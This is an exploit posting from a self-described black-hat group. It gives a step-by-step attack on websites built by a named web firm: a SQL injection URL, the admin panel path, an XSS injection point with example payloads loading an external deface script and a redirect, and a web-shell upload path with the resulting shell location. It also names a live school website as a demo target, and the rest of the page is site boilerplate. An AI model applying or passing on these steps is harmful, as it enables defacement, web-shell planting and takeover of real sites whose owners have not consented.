কারিগরী সহায়তায়: WAN IT LTD SQl - XSS Attack

2017.10.26

mr.Gh0st N@0b (MM)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#####################################################
# Exploit Title :  কারিগরী সহায়তায়: WAN IT LTD SQl/XSS Deface Multi Vul
# Google Dork : N/A
# Exploit Author : mr.Gh0st N@0b
# Tested On : Windows 10
# CWEs : CWE-89
# Date : 26.10.2017
#####################################################

# [POC]
# http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject}

# [Admin Panel]
# http://site.com/admin/    {login Here}

# [XSS Alert]
# /admin/add_news.php?menu=news {Exploit XSS Script}

# Example 
# <script src="http://yourdeface.js"></script>
# <META http-equiv="refresh" content="1;URL=yourdefacepage">

# [Upload Shell]
# /admin/add_gallery.php?menu=gallery {Upload Here}

# [Shell Path]
# http://www.site.com/admin/upload/gallery/yourshell

# [Demo]
# http://sonarhatsnc.edu.bd/
#####################################################

# [Bio]
# mr.Gh0st N@0b ~ Myanmar Noob Hackers
# Greetz to All Myanmar Black Hats
# We Are -> H@73L noob -> Noob L34Rn3r -> ko noob -> Noob Soul -> N@ob 5t4r -> Noob Att@ck3r -> NooB 8007 -> Z3Ro Noob -> B@by Noob F!ght3R -> mr.Gh0st N@0b -> MrK1DD13 Noob
# https://www.facebook.com/official.myanmar.noob.hackers/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

কারিগরী সহায়তায়: WAN IT LTD SQl - XSS Attack

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.